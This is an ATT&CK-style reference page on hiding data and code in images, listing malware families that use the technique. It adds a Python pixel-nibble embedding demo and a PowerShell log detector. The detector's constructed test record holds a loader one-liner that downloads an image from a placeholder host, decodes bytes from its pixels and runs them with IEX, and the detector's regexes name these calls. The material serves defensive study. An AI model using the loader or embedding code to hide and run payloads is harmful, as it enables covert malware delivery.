Obfuscated Files or Information: Steganography

Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.

Duqu was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.[1]

By the end of 2017, a threat group used Invoke-PSImage to hide PowerShell commands in an image file (.png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.[2]
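As an added example (not code from the ATT&CK page or from Invoke-PSImage itself), the block below shows the pixel-level trick the paragraph describes: each payload byte is split into two nibbles and written into the four low bits of two colour values of one pixel, which is the layout Invoke-PSImage documents. Everything else here is this example's own choice and should be treated as an assumption: the blue-high/green-low nibble assignment, the 4-byte length prefix, the constructed gradient carrier, the constructed (harmless) payload, and the minimal standard-library PNG writer/reader (8-bit RGB, filter type 0 only).

```python
"""Added example, not code from the ATT&CK page or from Invoke-PSImage: hide a script in the
low nibbles of the blue and green channels of an RGB image (the "4 low bits of two colour
values per pixel" layout Invoke-PSImage documents; the B-high/G-low assignment and the
length framing are this example's assumptions) and recover it. The carrier image and the
payload are constructed here; the PNG writer/reader use only the standard library."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(tag: bytes, body: bytes) -> bytes:
    """Serialise one PNG chunk: length, tag, body, CRC32 over tag+body."""
    crc = zlib.crc32(tag + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)


def write_png(width: int, height: int, pixels: bytes) -> bytes:
    """Encode an 8-bit RGB buffer (row-major, 3 bytes per pixel) as a PNG with filter type 0."""
    stride = width * 3
    raw = b"".join(b"\x00" + pixels[y * stride:(y + 1) * stride] for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # depth 8, colour type 2 (RGB)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_png(data: bytes):
    """Decode a PNG produced by write_png (8-bit RGB, filter 0). Returns (width, height, pixels)."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos < len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        tag, body = data[pos + 4:pos + 8], data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if (depth, ctype) != (8, 2):
                raise ValueError("only 8-bit RGB is supported here")
        elif tag == b"IDAT":
            idat += body
        pos += 12 + length  # length field + tag + body + crc
    raw, stride = zlib.decompress(idat), width * 3 + 1
    if any(raw[y * stride] != 0 for y in range(height)):
        raise ValueError("only filter type 0 is supported here")
    return width, height, b"".join(raw[y * stride + 1:(y + 1) * stride] for y in range(height))


def embed(pixels: bytes, payload: bytes) -> bytes:
    """Put one payload byte per pixel: high nibble into the low 4 bits of B, low nibble into G.
    A 4-byte big-endian length prefix (this example's framing) lets extract() know where to stop."""
    framed = struct.pack(">I", len(payload)) + payload
    if len(framed) * 3 > len(pixels):
        raise ValueError("payload too large for carrier")
    out = bytearray(pixels)
    for i, b in enumerate(framed):
        g, bl = i * 3 + 1, i * 3 + 2
        out[bl] = (out[bl] & 0xF0) | (b >> 4)
        out[g] = (out[g] & 0xF0) | (b & 0x0F)
    return bytes(out)


def extract(pixels: bytes) -> bytes:
    """Inverse of embed(): rebuild each byte as (B & 15) << 4 | (G & 15)."""
    def byte_at(i: int) -> int:
        return ((pixels[i * 3 + 2] & 0x0F) << 4) | (pixels[i * 3 + 1] & 0x0F)
    n = struct.unpack(">I", bytes(byte_at(i) for i in range(4)))[0]
    return bytes(byte_at(i) for i in range(4, 4 + n))


def max_channel_delta(a: bytes, b: bytes) -> int:
    """Largest per-channel change between two pixel buffers; nibble embedding never exceeds 15."""
    return max(abs(x - y) for x, y in zip(a, b))


# Constructed carrier: a 64x16 colour gradient, and a constructed, harmless script to hide.
WIDTH, HEIGHT = 64, 16
CARRIER = bytes(v for y in range(HEIGHT) for x in range(WIDTH)
                for v in ((x * 4) & 0xFF, (y * 16) & 0xFF, ((x + y) * 2) & 0xFF))
DEMO_PAYLOAD = b"Write-Host 'decoded from pixels'"


def demo() -> bytes:
    """Round trip: carrier -> PNG with hidden payload -> parsed PNG -> recovered payload."""
    png = write_png(WIDTH, HEIGHT, embed(CARRIER, DEMO_PAYLOAD))
    _, _, pixels = read_png(png)
    return extract(pixels)


if __name__ == "__main__":
    print(demo(), max_channel_delta(CARRIER, embed(CARRIER, DEMO_PAYLOAD)))
```

The point a practitioner should take from the round trip is the size of the change: no colour value moves by more than 15 out of 255, the file stays a valid PNG, and nothing about the image metadata reveals the payload. That is why the page treats the decoder, not the carrier, as the detectable component.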

ID: T1027.003
Sub-technique of:  T1027
Tactic: Defense Evasion
Platforms: Linux, Windows, macOS
Data Sources: Binary file metadata
Version: 1.0
Created: 05 February 2020
Last Modified: 08 June 2020

Procedure Examples

Name  Description

ABK  ABK can extract a malicious Portable Executable (PE) from a photo.[5]

APT37  APT37 uses steganography to send images to users that are embedded with shellcode.[6][7]

Avenger  Avenger can extract backdoor malware from downloaded images.[5]

BBK  BBK can extract a malicious Portable Executable (PE) from a photo.[5]

BRONZE BUTLER  BRONZE BUTLER has used steganography in multiple operations to conceal malicious payloads.[5]

build_downer  build_downer can extract malware from a downloaded JPEG.[5]

MuddyWater  MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.[8]

Okrum  Okrum's payload is encrypted and embedded within its loader, or within a legitimate PNG file.[4]

PowerDuke  PowerDuke uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA).[3]

Tropic Trooper  Tropic Trooper has used JPG files with encrypted payloads to mask their backdoor routines and evade detection.[9]


Mitigations

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Detection

Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography, since the carrier file itself is usually indistinguishable from a legitimate image.
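One way to act on that advice, as an added example that is not part of the ATT&CK page: scan PowerShell script block text for the decoder pattern an Invoke-PSImage-style loader leaves behind (a System.Drawing.Bitmap is opened, GetPixel is called in a loop, bytes are rebuilt with -band/-bor arithmetic, and the result is handed to IEX). The log records, indicator names, and the requirement that an image-decoding API appear together with string execution are all this example's own assumptions; the records are constructed to resemble script block logging (Event ID 4104) output and were not captured from a real system.

```python
"""Added example, not code from the ATT&CK page: flag PowerShell script-block text that
reads bytes out of image pixels and executes the result. The records below are
constructed for this example; the indicator names and weighting are assumptions."""
import re

# Each indicator is (name, regex). Names are this example's own labels.
INDICATORS = [
    ("image_decode_api", re.compile(r"System\.Drawing\.Bitmap|\.GetPixel\(", re.I)),
    ("bit_twiddling", re.compile(r"-band\s*15|-bor\b|-shl\b|-shr\b|\*\s*16\b", re.I)),
    ("byte_buffer", re.compile(r"\bByte\[\]", re.I)),
    ("bytes_to_string", re.compile(r"Text\.Encoding\]::\w+\.GetString", re.I)),
    ("exec_of_string", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("remote_fetch", re.compile(r"Net\.WebClient|Invoke-WebRequest|DownloadData|OpenRead", re.I)),
]


def score_block(text: str):
    """Return (suspicious, matched indicator names) for one script block."""
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    # The defining combination: pixels are read AND the rebuilt bytes are turned into code.
    suspicious = "image_decode_api" in hits and ("exec_of_string" in hits or "bytes_to_string" in hits)
    return suspicious, hits


def scan(records):
    """Return [(record id, indicator names)] for blocks that look like image-to-code decoders."""
    flagged = []
    for rid, text in records:
        suspicious, hits = score_block(text)
        if suspicious:
            flagged.append((rid, hits))
    return flagged


# Constructed 4104-style entries: (record id, ScriptBlockText). Record 2 is a benign thumbnail
# script that also uses System.Drawing; record 3 is written in the style of the Invoke-PSImage loader.
LOG_RECORDS = [
    (1, "Get-ChildItem C:\\Users -Recurse -Filter *.docx | Measure-Object"),
    (2, "Add-Type -AssemblyName System.Drawing; $b = New-Object System.Drawing.Bitmap('C:\\img\\in.png'); "
        "$r = New-Object System.Drawing.Bitmap($b, 200, 100); $r.Save('C:\\img\\thumb.png')"),
    (3, "sal a New-Object;Add-Type -A System.Drawing;"
        "$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead('http://example.invalid/logo.png'));"
        "$o=a Byte[] 1280;for($i=0;$i -le 9;$i++){foreach($x in(0..127)){$p=$g.GetPixel($x,$i);"
        "$o[$i*128+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};"
        "IEX([System.Text.Encoding]::ASCII.GetString($o[0..1279]))"),
]


if __name__ == "__main__":
    for rid, hits in scan(LOG_RECORDS):
        print(f"record {rid}: {', '.join(hits)}")
```

The benign image-resizing block trips only the image_decode_api indicator and is not flagged; the loader-style block trips every indicator. Requiring the decode-plus-execute pairing rather than any single string keeps ordinary System.Drawing use out of the alert queue, at the cost of missing a loader that writes the bytes to disk and runs them in a separate script block, which is worth a second rule keyed on the file write.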